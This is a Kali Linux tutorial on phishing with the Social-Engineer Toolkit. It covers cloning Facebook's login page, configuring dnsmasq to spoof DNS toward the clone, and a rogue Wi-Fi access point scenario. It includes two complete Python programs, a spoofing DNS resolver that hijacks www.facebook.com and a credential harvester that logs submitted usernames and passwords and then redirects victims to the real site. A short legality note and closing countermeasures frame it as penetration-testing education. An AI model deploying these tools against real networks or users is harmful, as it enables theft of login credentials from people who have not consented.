Kali Linux : Social Engineer Toolkit (Phishing)


In this guide we’ll explore a small handful of the features of TrustedSec’s SET (Social-Engineer Toolkit).

You’ll learn about credential harvesting. This involves using SET to clone a legitimate website such as Facebook’s login page. Any user who tries to log in on the clone is in fact sending their username and password to SET, which records the credentials and then redirects the browser to the real website, so the victim simply sees the genuine login page and rarely notices anything wrong.

Is this legal?

When you first fire up SET, you’ll be asked to promise that you’ll only use it for legitimate penetration testing. This means that you have the permission, ideally in writing, of both the network owner and anyone likely to connect their device to your rogue AP.

There’s nothing illegal in itself about using hacking tools or equipment; indeed it’s essential for defenders to have access to the same tools as attackers in order to protect users from them.

SET is written in Python, so it runs on virtually any Linux distribution. However, you may prefer to simply download and run Kali, which comes with SET preinstalled.

(Download Kali from : https://www.kali.org/).

One of the more worrying aspects of SET is that the cloned page is just a web page, so it works against almost every device with a browser.

While there have been great strides towards preventing DNS poisoning of public resolvers, if you control the network to which a user connects, you also control which DNS server their device is told to use, and it is very likely you can divert requests for legitimate websites to your cloned page.

DNS (Domain Name System) servers form the backbone of the internet. They act as a kind of virtual telephone directory, translating human-readable web addresses such as www.google.com into machine-readable IP addresses.

DNS spoofing means making a DNS server answer with an IP address of your choice when a victim looks up a certain website, in our case the address of the cloned page created with SET. DNS cache poisoning, with which it is often confused, achieves this by corrupting the cached data of a resolver you do not control. The approach below is simpler: on a network you control you run the resolver yourself and hand it out to clients (for example via DHCP), so no cache has to be poisoned at all.

On Linux you can use the tool dnsmasq to create a custom DNS server and redirect traffic in this way.

To install the tool from the terminal:

sudo apt-get install dnsmasq

(The dnsmasq-base package contains only the binary; the dnsmasq package also ships the sample /etc/dnsmasq.conf edited below and a service that starts automatically, which is why it is stopped again before relaunching further down.)

Then configure it by editing the file:

/etc/dnsmasq.conf

And add:

# Do not hand out DHCP leases on the lab interface (eth0 is a placeholder for your interface name).
no-dhcp-interface=eth0
# Forward every name that is not spoofed to a real resolver.
server=8.8.8.8
# Ignore this machine's own /etc/hosts and use only the spoof list below.
no-hosts
addn-hosts=/etc/dnsmasq.hosts

Then create the file /etc/dnsmasq.hosts, which uses the same format as /etc/hosts, one pair per line:

<machine-ip> <target-hostname>

where <machine-ip> is the address of the machine running SET. For example:

192.168.1.200 www.facebook.com

Only the exact hostname listed is spoofed: add a separate line for facebook.com, m.facebook.com and any other hostname the login page may send the browser to (dnsmasq’s address= option can be used instead to catch a whole domain).

Finally, stop the dnsmasq instance the package started and relaunch it in the foreground so you can watch queries arrive:

sudo killall dnsmasq
sudo dnsmasq --no-daemon --log-queries

(Binding port 53 needs root, hence sudo.) Every lookup a client sends is now logged, with the spoofed names answered from /etc/dnsmasq.hosts and everything else forwarded to 8.8.8.8.
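
What the dnsmasq configuration above is doing, written out as a small spoofing resolver in Python. This is an added example, not code from dnsmasq or SET; the hijacked name, the 192.168.1.200 harvester address and the 8.8.8.8 upstream are the same lab values used above and are assumptions you would replace for your own network.

```python
"""Minimal spoofing DNS resolver (added example; not dnsmasq or SET code).

Does what the dnsmasq configuration above does: answer A queries for the
names in SPOOF_MAP with the harvester's address and forward every other
query to a real upstream resolver.  Only A queries are spoofed; AAAA and
other types fall through so a dual-stack browser still works.
"""
import ipaddress
import socket
import struct

# Constructed lab values (assumptions): the harvester machine and the name to hijack.
SPOOF_MAP = {"www.facebook.com": "192.168.1.200"}
UPSTREAM = ("8.8.8.8", 53)  # same forwarder as the dnsmasq config above
QTYPE_A = 1


def parse_question(pkt):
    """Return (qname, qtype, offset just past the question) of a single-question packet."""
    if struct.unpack("!H", pkt[4:6])[0] != 1:
        raise ValueError("only single-question packets are handled")
    labels, pos = [], 12
    while True:
        ln = pkt[pos]
        pos += 1
        if ln == 0:
            break
        labels.append(pkt[pos:pos + ln].decode("ascii"))
        pos += ln
    qtype = struct.unpack("!H", pkt[pos:pos + 2])[0]
    return ".".join(labels).lower(), qtype, pos + 4


def build_query(name, qtype=QTYPE_A, txid=0x1234):
    """Build a standard recursive query, as a stub resolver would send it."""
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)
    qname = b"".join(bytes([len(label)]) + label.encode("ascii")
                     for label in name.split(".")) + b"\x00"
    return header + qname + struct.pack("!HH", qtype, 1)


def build_spoofed_answer(query, spoof_map=SPOOF_MAP, ttl=60):
    """Return a forged response if this is an A query for a spoofed name, else None."""
    qname, qtype, qend = parse_question(query)
    ip = spoof_map.get(qname)
    if qtype != QTYPE_A or ip is None:
        return None
    rd = query[2] & 0x01  # copy the client's "recursion desired" bit
    # Flags: QR=1, AA=1, RD as requested, RA=1, RCODE=0 (NOERROR).
    flags = struct.pack("!H", 0x8480 | (rd << 8))
    header = query[:2] + flags + struct.pack("!HHHH", 1, 1, 0, 0)
    question = query[12:qend]
    # One answer RR: name as a compression pointer to offset 12, type A, class IN.
    rr = struct.pack("!HHHIH", 0xC00C, QTYPE_A, 1, ttl, 4) + socket.inet_aton(ip)
    return header + question + rr


def first_a_record(resp):
    """Return the IPv4 address in the first answer RR of a response built above, or None."""
    _, _, pos = parse_question(resp)
    if struct.unpack("!H", resp[6:8])[0] == 0:
        return None
    rdlen = struct.unpack("!H", resp[pos + 10:pos + 12])[0]  # after name(2) type(2) class(2) ttl(4)
    return socket.inet_ntoa(resp[pos + 12:pos + 12 + rdlen]) if rdlen == 4 else None


def looks_spoofed(qname, ip):
    """Defender-side check: a public hostname resolving to a private address is a red flag."""
    return not qname.endswith((".local", ".lan", ".home")) and ipaddress.ip_address(ip).is_private


def serve(listen=("0.0.0.0", 53)):
    """Answer spoofed names locally and forward everything else (binding port 53 needs root)."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.bind(listen)
    upstream = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    upstream.settimeout(2)
    while True:
        query, client = sock.recvfrom(512)
        try:
            resp = build_spoofed_answer(query)
        except (ValueError, IndexError, UnicodeDecodeError):
            continue  # malformed or multi-question packet: drop it
        if resp is None:
            try:
                upstream.sendto(query, UPSTREAM)
                resp, _ = upstream.recvfrom(4096)
            except socket.timeout:
                continue
        sock.sendto(resp, client)


if __name__ == "__main__":
    serve()
```

Run it as root on the harvester machine (it binds UDP port 53) and point a second host at it as its DNS server: resolving www.facebook.com from that host should now return 192.168.1.200, while any other name still resolves normally through the upstream. The looks_spoofed check is the defender’s side of the same fact: a public hostname that answers with a private (RFC 1918) address is a strong sign that the local resolver is lying to you.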


SET (Social Engineer Toolkit)

The simplest way to get started with SET is to download and boot a “Live” version of Kali Linux. We will focus on using SET’s site cloner to create a copy of a Facebook login page.

Click the Applications menu and you will find SET under the Social Engineering Tools category; alternatively, run setoolkit from a terminal.

Once SET loads:

Choose option 1) Social-Engineering Attacks

then option 2) Website Attack Vectors

then option 3) Credential Harvester Attack Method

and finally option 2) Site Cloner

SET will then ask for the IP address the cloned page should POST the harvested form back to. It offers the local address it detected as the default; press Return to accept it, or type the address your victims will reach (192.168.1.200 in the dnsmasq example above).

Next, SET will ask you to enter the URL to clone; in this case it is: www.facebook.com

Once SET has finished cloning, it listens for incoming connections. Open a browser on the same machine where the harvester is running and type your local IP, for example 192.168.1.200. You should see the spoofed page load. Submit the form and SET prints every POSTed field, highlighting possible usernames and passwords in red; once the cloned page has harvested the details it redirects the browser to the genuine URL.

Now, a real attacker would have some trouble persuading users to type in the IP of his machine rather than the proper URL. You can simulate a real attack by setting up a DNS server to divert them to your fake web page (see the dnsmasq configuration above). Bear in mind that the clone is served over plain HTTP: a browser that already knows the real site only over HTTPS (facebook.com is on the HSTS preload list) will silently upgrade the request to https:// and then either fail to connect, since SET listens on port 80, or show a certificate error it will not let the user click through, so in a real engagement the victim has to be lured to a hostname the browser has no such memory of.
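
To show what SET’s Credential Harvester is doing behind the menu, here is a minimal harvester in Python. It is an added example, not SET’s own code: it serves a stand-in for the cloned page, records every field of a POSTed login, and bounces the browser to the real site with a redirect. The form, the example credentials and the redirect target are constructed for the demo, and the simulate_victim helper stands in for a victim’s browser so the whole thing runs offline.

```python
"""Minimal credential harvester (added example; not SET's code).

Shows the three things SET's Site Cloner does once a victim reaches the
cloned page: serve a look-alike login form, record every field the victim
POSTs, then redirect the browser to the real site so the victim lands on
a normal login page and rarely notices.
"""
import http.client
import json
import threading
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer
from urllib.parse import parse_qs

REAL_SITE = "https://www.facebook.com/"  # where victims are bounced after capture
CREDENTIAL_KEYS = ("email", "user", "pass")  # substrings SET-style highlighting looks for

HARVESTED = []  # in-memory log; SET writes a harvester_*.txt file instead

# Constructed stand-in for a cloned page: a bare login form posting back to "/".
CLONED_PAGE = b"""<html><body><form method="post" action="/">
<input name="email"><input name="pass" type="password"><button>Log In</button>
</form></body></html>"""


def extract_credentials(body, content_type="application/x-www-form-urlencoded"):
    """Return (all_fields, likely_credentials) parsed from a POST body."""
    if content_type.startswith("application/x-www-form-urlencoded"):
        fields = {k: v[0] for k, v in parse_qs(body.decode("utf-8", "replace")).items()}
    elif content_type.startswith("application/json"):
        parsed = json.loads(body)
        fields = parsed if isinstance(parsed, dict) else {}
    else:
        fields = {}
    likely = {k: v for k, v in fields.items()
              if any(key in k.lower() for key in CREDENTIAL_KEYS)}
    return fields, likely


class Harvester(BaseHTTPRequestHandler):
    def do_GET(self):
        # Serve the cloned page to anyone who arrives (by IP or via spoofed DNS).
        self.send_response(200)
        self.send_header("Content-Type", "text/html")
        self.send_header("Content-Length", str(len(CLONED_PAGE)))
        self.end_headers()
        self.wfile.write(CLONED_PAGE)

    def do_POST(self):
        length = int(self.headers.get("Content-Length", 0))
        body = self.rfile.read(length)
        fields, likely = extract_credentials(body, self.headers.get("Content-Type", ""))
        HARVESTED.append({"client": self.client_address[0], "fields": fields, "likely": likely})
        # Bounce the victim to the genuine site; SET does the same after harvesting.
        self.send_response(302)
        self.send_header("Location", REAL_SITE)
        self.send_header("Content-Length", "0")
        self.end_headers()

    def log_message(self, fmt, *args):
        pass  # keep stdout quiet; the capture lives in HARVESTED


def start_harvester(host="127.0.0.1", port=0):
    """Start the harvester in a background thread; return (server, bound_port)."""
    srv = ThreadingHTTPServer((host, port), Harvester)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv, srv.server_address[1]


def simulate_victim(port, body=b"email=alice%40example.com&pass=hunter2&login=Log+In"):
    """POST a constructed login to the harvester; return the (status, Location) it answers with."""
    conn = http.client.HTTPConnection("127.0.0.1", port, timeout=5)
    conn.request("POST", "/", body=body,
                 headers={"Content-Type": "application/x-www-form-urlencoded"})
    resp = conn.getresponse()
    status, location = resp.status, resp.getheader("Location")
    conn.close()
    return status, location


if __name__ == "__main__":
    server, bound_port = start_harvester()
    print("harvester listening on port", bound_port)
    print("victim got:", simulate_victim(bound_port))
    print("harvested:", HARVESTED)
    server.shutdown()
```

The victim’s browser never sees anything but a 302 to the real site, which is exactly why the redirect step matters to the attacker and why a defender reviewing proxy logs should look for a POST of login fields to an address that is immediately followed by a redirect to the real login page.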


Considerations

A real-world case is a free Wi-Fi connection of the kind found in airports or city centres: an attacker can set up a rogue Wi-Fi access point whose DHCP server hands out the attacker’s DNS resolver, and from there divert traffic to a cloned web page exactly as above.

Valid countermeasures a user can adopt are to use a VPN service, or a service like Tor, which resolve names through their own DNS path rather than the one the hotspot hands out; to take browser certificate warnings seriously, since a cloned page cannot present a valid certificate for the real site; and, where possible, to use accounts that support two-factor authentication and notify you when a new device tries to log in.